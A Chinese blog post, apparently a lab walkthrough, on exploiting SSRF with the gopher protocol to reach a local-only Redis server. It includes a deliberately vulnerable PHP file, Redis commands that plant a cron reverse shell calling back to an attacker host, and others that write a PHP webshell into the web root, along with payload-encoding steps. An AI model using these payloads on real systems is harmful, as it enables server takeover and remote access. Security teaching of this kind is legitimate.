你真的会利用SSRF漏洞?一文教你如何利用SSRF配合gopher协议拿下服务器

最新推荐文章于 2024-04-13 14:47:00 发布
最新推荐文章于 2024-04-13 14:47:00 发布
阅读量702 收藏 2
点赞数 1
分类专栏: 外网渗透 文章标签: 服务器 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61951055/article/details/130328934
版权

SSRF漏概述

SSRF(服务器端请求伪造)是种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下SSRF攻击的目标是从外网无法访问的内部系统

SSRF原理

由于服务端提供了从其他服务器应⽤获取数据的功能,但没有对地址和协议等做过滤和限制。使得攻击者可以利⽤存在缺陷的web应⽤作为代理,攻击其远程和本地的服务器

SSRF能做的事情

可以对外网服务器所在的内网、本地进行端口扫描务的banner信息
攻击运行在内网或者本地的应用程序
对内网web应用进行指纹识别,通过访问默认文件实现
攻击内外网的web应用。sql注入、struct2、redis等
利用file协议读取本地文件等

这里演示的是利用gopher协议去对redis数据库写入反弹shell和webshell

在真实环境中 我们找到了一个带有ssrf的网站,通过端口扫描发现一台只能本地访问的redis服务器
curl gopher通过SSRF写一个反弹shell和webshell

环境配置

一台linux靶机  里面有中间件和redis数据库

一台kali做为攻击机

环境配置

安装小皮面板

1 . 安装小皮面板

yum install -y wget && wget -O install.sh https://notdocker.xp.cn/install.sh && sh install.sh

2 . 登录小皮面板 => 开启apache服务 => 就在首页启动即可(其他不需要安装php已经自带有了)

3 . 安装redis服务

1 . yum install -y gcc
​
2 . wget https://download.redis.io/releases/redis-6.2.6.tar.gz
​
3 . tar -zxvf redis-6.2.6.tar.gz
​
4 . cd redis-6.2.6
​
5 . make

安装redis数据库

安装完成之后把配置文件复制到src目录下并修改配置文件

 

配置完启动redis

./redis-server redis.conf

写一个ssrf漏洞的php文件到小皮的根目录

/www/admin/localhost_80/wwwroot/
<?php
$url = $_GET['url'];
echo $url;
#var_dump(curl_version());
$curlobj = curl_init($url);
echo curl_exec($curlobj);
?>

利用过程

1 构造一个反弹shell的语句,URL编码加上gopher的特性把%0a变成%0d%0a最后面加上%0d%0a,
2 构造完成之后进行二次URL编码,http特性会自动解一次码,
3 再通过构造的gohper协议的语句进行url编码最后拼接curl hllp://目标ip/ssrf php?url=gopher://127.0.0.1:6379/_
4 注意要对参数后面的gopher进行编码,因为http特性会自动解一次码把  :        //        /都编码
5 再使用ssrf的漏洞对redis进行跳板写入反弹shell

先把反弹的shell进行URL编码

set xx   "\n* * * * * bash -i >& /dev/tcp/攻击者的ip/端口 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

再把编码的东西%0a换成%0d%0a,最后再加上%0d%0a,加完之后再拿到bp进行第二次编码

 

 对参数的gopher协议进行编码

gopher://127.0.0.1:6379/_

编完码之后与上面二次编码的payload进行拼接

curl http://目标ip/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_

 使用kali进行攻击

 等待计划任务的反弹shell

 

反弹成功

再是写入一个webshell

和反弹shell一样的原理我们只需要修改计划任务里的构造语句,使用http协议要进行二次编码,再进行拼接就行了

set tom "\n\n\n\n* * * * * <?php phpinfo();?>\n\n\n\n"
config set dir /www/admin/localhost_80/wwwroot/
config set dbfilename shell.php
save

成功写入

总结:

gopher协议 会默认用url编码
gopher:编码的注意事项(一定要放到bp编码)
? 需要编码
空格 需要编码
在每个段落结束都需要加上%0d%0a
几个段得变成一行

配合http协议就得再次对构造的payload进行编码,http的特性会默认解一次码,所以要对gopher协议后面的内容进行二次编码,http协议的要一次编码

挽风129
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
SSRF攻击与Gopher协议
RuiLike的博客
06-04 1264
Gopher定义Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;gopher支持发出GET、POST请求。
看完这篇 教你玩转渗透测试靶机Vulnhub——HarryPotter:Nagini
Aluxian_的博客
08-01 605
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:这个是HarryPotter(哈利波特)系列一共有三个靶机,这是第二个Nagini老样子需要获得root权限找到flag(这里是魂器)即可。这个靶机难度高,就是有点费时间麻烦 其他都还好1.信息收集获取ip地址 和端口信息web等2.SSRF漏洞利用Gopherus工具的使用MD5sum生成md5加密值3.joomscan。
ssrf漏洞利用(内网探测、打redis)_ssrf内网探测,滴滴公司面试经验
最新发布
2301_79988566的博客
04-13 695
gopher协议是比http协议更早出现的协议,现在已经不常用了,但是在SSRF漏洞利用gopher可以说是万金油,因为可以使用gopher发送各种格式的请求包,这样就可以解决漏洞点不在GET参数的问题了。这个协议可以读取系统的一些存放密码的文件,比如说linux的/etc/passwd或者windows的C:/windows/win.ini 等,或者说ctf中的flag文件。payload采用的是bash反弹,定时程序路径是/var/spool/cron/root。
SSRF利用协议中的万金油——Gopher
qq_57172130的博客
08-07 7172
使用gopher协议进一步利用ssrf
SSRF漏洞理解进阶&SSRF+gopher打内网(redis、mysql、fastcgi)& SSRF相关基础概念
东隅的博客
10-25 8052
SSRF漏洞理解进阶&SSRF+gopher打内网(redis、mysql、fastcgi)& SSRF相关基础概念。首先要了解几个概念:内网&外网代理curlgopher、ftp、dict伪协议file_get_contents()、 fsockopen() 、curl_exec() 等函数。
SSRF利用 Gopher |Gopher攻击mysql及内网
crispr的博客
06-23 5140
SSRF利用 Gopher 0X01 前言 研究了一天Gopher协议的应用,实践之后决定写一下关于Gopher协议SSRF利用的相关总结。 参考链接:https://blog.csdn.net/qq_41107295/article/details/103026470 0X02 概述 SSRF(Server-Side Request Forgery)服务端请求伪造,是一种由攻击者构造形成由...
你未见过的SSRF利用方式
06-20
Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解⼀个ssrf的...
WebLogic SSRF漏洞修复
11-25
WebLogic SSRF漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
第三节 SSRF利用 - 内网资源访问-01
09-15
"第三节 SSRF利用 - 内网资源访问-01" 本节课程主要讲解了SSRF漏洞的_php_函数,包括file_get_contents、fsockopen()和curl_exec()三个函数的使用和可能存在的漏洞SSRF漏洞的定义 SSRF漏洞全称为Server-side ...
SSRF利用总结
04-24
SSRF漏洞利用总结,类似SQL注入小计的形式,总结地比较完整。
Day57:WEB攻防-SSRF服务端请求&Gopher协议&无回显利用&黑白盒挖掘&业务功能点
qq_61553520的博客
03-30 1613
小迪安全-Day57:WEB攻防-SSRF服务端请求&Gopher协议&无回显利用&黑白盒挖掘&业务功能点
SSRF漏洞(原理、挖掘点、漏洞利用、修复建议)
xv66666的博客
07-03 5403
SSRF (Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。
ssrf详解(包含常见绕过和协议利用)
m0_73452266的博客
09-04 349
关于ssrf常见的利用,以及file,dict,gopher协议利用
SSRF最全总结(协议,绕过)
热门推荐
weixin_50464560的博客
01-13 1万+
https://www.anquanke.com/post/id/262430#h3-46   SSRF-Labs配置 有些初学者喜欢用这个靶场,讲下怎么搭建 我用的是Ubuntu18;docker和docker-compose配置可以参考vulhub官网的配置;下面是谷歌搜的 $ curl -sSL https://get.docker.com/ | sh #脚本安装docker $ apt install docker-compose #安装docker compose Basic关和
CTFHub技能树 Web-SSRF Redis协议
Senimo
07-05 1732
CTFHub技能树 Web-SSRF Redis协议 hint:这次来攻击redis协议吧.redis://127.0.0.1:6379,资料?没有资料!自己找! 启动环境,依然为空白,查看URL: http://challenge-bd5faa8b900de693.sandbox.ctfhub.com:10800/?url=_ 通过GET方式传递参数url的值,题目提示为攻击Redis协议。 使用Gopherus生成所需攻击Redis的Paylaod: 选择PHPShell,根目录路径为默认值,使用默
ssrf漏洞原理是?ssrf漏洞有什么危害?如何挖掘和利用ssrf漏洞ssrf常用的协议有哪些,并分别说明有啥作用?
weixin_57108799的博客
03-19 442
ssrf漏洞
ssrfgopher协议的使用和配置,以及需要注意的细节
qq_59020256的博客
12-30 1459
如果说要长期得到则需要在vim /etc/selinux/config 里面将enforcing改为disabled。RL:gopher://<host>:<port>/<gopher-path>_ 后接TCP数据流。如果发起post请求,回车换行需要使用%0d%0a,如果多个参数,参数之间的&也需要进行URL编码。这里需要注意当出现403报错时需要输入 setenforce 0可以暂时得到root权限。创建一个post请求的php代码如下。创建一个get请求的php代码如下。将如下代码进行url编码。
如何在实际环境中找到SSRF漏洞
05-15
在实际环境中,可以通过以下方式来发现SSRF漏洞: 1. 扫描器:使用自动化工具,如SSRFmap、Burp Suite、Nmap等对目标应用程序进行扫描和测试,以查找潜在的SSRF漏洞。 2. 输入URL:在应用程序中输入不同的URL,检查响应是否包含敏感信息或是否发生了不应该发生的行为。尝试使用不同的协议,如file://、gopher://、dict://等。 3. 绕过限制:如果应用程序限制了可以使用的URL或域名,可以尝试使用URL编码、IP地址或其他绕过技巧来绕过限制。 4. 手工测试:通过手动测试应用程序的不同部分,如文件上传、电子邮件发送等,可以发现潜在的SSRF漏洞。 5. 阅读代码:通过阅读应用程序的代码,可以发现可能存在SSRF漏洞的代码段,如使用URL输入参数的代码。 需要注意的是,在进行SSRF漏洞测试时,一定要遵守法律法规,并经过授权进行测试。未经授权的测试可能导致被视为攻击行为,产生法律后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值